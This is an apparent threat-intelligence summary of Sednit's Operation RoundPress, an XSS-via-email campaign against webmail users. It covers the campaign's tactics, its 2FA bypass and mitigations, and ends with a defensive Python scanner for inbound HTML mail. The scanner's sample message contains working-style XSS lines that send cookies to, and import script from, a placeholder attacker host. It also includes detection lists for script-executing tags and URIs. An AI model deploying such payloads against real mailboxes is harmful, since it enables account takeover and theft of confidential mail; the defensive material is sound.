Operation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU
Analysis Summary
# Threat Actor: Sednit (Operation RoundPress)
## Attribution & Identity
Attributed by ESET researchers to the Russia-aligned APT group **Sednit** (also tracked as APT28, Fancy Bear and Forest Blizzard).
## Activity Summary
The campaign described is **Operation RoundPress**. It targets webmail software in order to steal secrets from email accounts: a spearphishing email carries an XSS payload in its HTML body, and the script runs inside the victim's authenticated webmail session as soon as the message is rendered, with no link click or attachment required. The actors initially targeted Roundcube and later expanded to Horde, MDaemon and Zimbra. In some instances they also bypassed two-factor authentication (2FA). Because the payload already runs inside a logged-in session, 2FA at login does not stop it, and ESET reports that the MDaemon payload went further, reading the account's 2FA secret and creating an application password that grants mailbox access without a second factor.
## Tactics, Techniques & Procedures
- Exploiting Cross-Site Scripting (XSS) vulnerabilities in webmail front ends. The payload is JavaScript embedded in the HTML body of a spearphishing email; it executes in the target's browser when the message is viewed in the webmail client.
- Exploitation of a **zero-day XSS flaw** in **MDaemon webmail software**; the other products were attacked through XSS flaws that were already known.
- Targeting Roundcube, Horde, MDaemon, and Zimbra webmail platforms, with payloads adapted to each product's front end.
- Circumvention of Two-Factor Authentication (2FA): the script acts from within an already-authenticated session, and in the MDaemon case it could create an application password for persistent access that is not subject to 2FA.
- Primary objective is exfiltration of confidential information from email accounts: mailbox contents, contacts and webmail credentials.
## Targeting
- Sectors: Governmental organizations and Defense contractors.
- Geography: Officials working for various governmental organizations in **Ukraine**, and defense contractors in **Europe** (including EU member states) **and on other continents**.
- Victims: Specific governmental organizations and defense companies whose email accounts were compromised; individual victims are not named in the summary.
## Tools & Infrastructure
- Malware families used: Not named in the summary. The tooling consists of JavaScript payloads delivered through XSS and executed in the victim's browser against the webmail application; the mail server itself is not the component being exploited.
- Infrastructure (C2, domains, IPs): No specific IOCs (IPs/domains) were provided in the summary text.
## Implications
Sednit remains an active espionage actor, and Operation RoundPress shows it combining zero-day exploitation (XSS) with widely deployed communication infrastructure (webmail) to reach sensitive government and defense data. The 2FA bypass is less a cryptographic break than a consequence of where the code runs: script executing in an authenticated browser session inherits that session's access and can use the application's own endpoints, so a second factor enforced only at login does not protect the mailbox once the message is rendered.
## Mitigations
- Patch or update all instances of webmail software, specifically Roundcube, Horde, MDaemon, and Zimbra, prioritising the known XSS vulnerabilities in each product. Where the product allows it, restrict or disable HTML rendering of inbound mail, enforce server-side HTML sanitisation, and deploy a Content Security Policy so that injected script cannot load or call out to unexpected origins.
- Treat 2FA as protecting the login, not the session. Alert on application-password creation, 2FA secret changes or re-enrolment, and new mail-client logins for an account; shorten webmail session lifetimes and bind sessions to the client where possible.
- Implement monitoring for anomalous behaviour associated with email account credential harvesting or session hijacking: bursts of message-fetch or contact-export requests from a single webmail session, outbound requests from webmail pages to unknown domains (a report-only CSP surfaces these), and inbound messages whose HTML body contains script, event-handler attributes or script URIs, which can be flagged at the mail gateway.
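The TTPs above describe the delivery vector (JavaScript carried in the HTML body of an email) and the last mitigation asks for that to be flagged at the gateway. The following is an added example, written for this page and not part of ESET's report or any vendor's tooling: a small scanner that walks the MIME parts of a raw message, feeds each `text/html` part through Python's standard-library `HTMLParser` (so entity-encoded attributes are decoded the way a browser would decode them), and reports tags, `on*` event handlers and script URIs that should never appear in mail. The sample messages are constructed for the example; the `c2.example.invalid` host and the specific handlers are illustrative, not indicators from the campaign.

```python
"""Flag HTML e-mail parts that carry constructs able to execute script when
rendered by a webmail client. Added example; not ESET's or any vendor's code."""
import email
from email import policy
from html.parser import HTMLParser

# Tags that have no legitimate place in an e-mail body and can run or load script.
ACTIVE_TAGS = {"script", "iframe", "frame", "object", "embed", "base", "form", "link", "meta"}
# Attributes that take a URI and therefore may carry a javascript: / data: payload.
URI_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data", "poster", "background"}
# Scheme prefixes a browser would execute rather than fetch.
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


def normalize_uri(value: str) -> str:
    """Mimic the browser's tolerance for obfuscation: drop tabs, newlines and
    control characters inside the scheme, then lowercase and strip leading space."""
    cleaned = "".join(ch for ch in value if ord(ch) > 0x1F)
    return cleaned.lstrip().lower()


class XssTagScanner(HTMLParser):
    """Collect findings as human-readable strings while parsing one HTML part."""

    def __init__(self) -> None:
        super().__init__()          # convert_charrefs=True: attribute values are entity-decoded
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names; also fires for <img .../>.
        if tag in ACTIVE_TAGS:
            self.findings.append(f"active tag <{tag}>")
        if tag == "svg":
            self.findings.append("inline <svg> (can carry handlers or <script>)")
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URI_ATTRS:
                uri = normalize_uri(value)
                if uri.startswith(SCRIPT_SCHEMES):
                    self.findings.append(f"script URI in {name} on <{tag}>: {uri[:40]}")


def scan_message(raw: bytes) -> list[str]:
    """Return every finding across all text/html parts of a raw RFC 5322 message.
    Transfer encodings (base64, quoted-printable) are undone by the email package."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings: list[str] = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            scanner = XssTagScanner()
            scanner.feed(part.get_content())
            scanner.close()
            findings.extend(scanner.findings)
    return findings


# Constructed sample: a benign-looking notice whose HTML part carries three
# distinct script-execution vectors (handler on <img>, handler on <svg>,
# entity-obfuscated javascript: URI). Hostnames are placeholders.
SAMPLE_EML = b"""\
From: sender@example.invalid
To: victim@example.invalid
Subject: Notice (constructed sample)
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Please see the notice.
--b1
Content-Type: text/html; charset=utf-8

<html><body>
<p>Please see the notice.</p>
<img src="x" onerror="fetch('https://c2.example.invalid/?c='+document.cookie)">
<svg onload="import('https://c2.example.invalid/p.js')"></svg>
<a href="java&#x09;script:void(0)">open</a>
</body></html>
--b1--
"""

# Constructed benign message for comparison.
BENIGN_EML = b"""\
From: sender@example.invalid
To: victim@example.invalid
Subject: Hello (constructed sample)
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body><p>Agenda attached. <a href="https://intranet.example.invalid/">Link</a></p></body></html>
"""

if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_EML), ("benign", BENIGN_EML)):
        hits = scan_message(raw)
        print(f"{label}: {len(hits)} finding(s)")
        for hit in hits:
            print("  -", hit)
```

Run it against an `.eml` file by reading the bytes and calling `scan_message`. The scanner is a triage aid, not a sanitiser: it tells you which inbound messages deserve a look (or a quarantine rule), while the rendering side still needs a real allowlist sanitiser and a Content Security Policy, because a pattern list can always be sidestepped by a vector it does not know about.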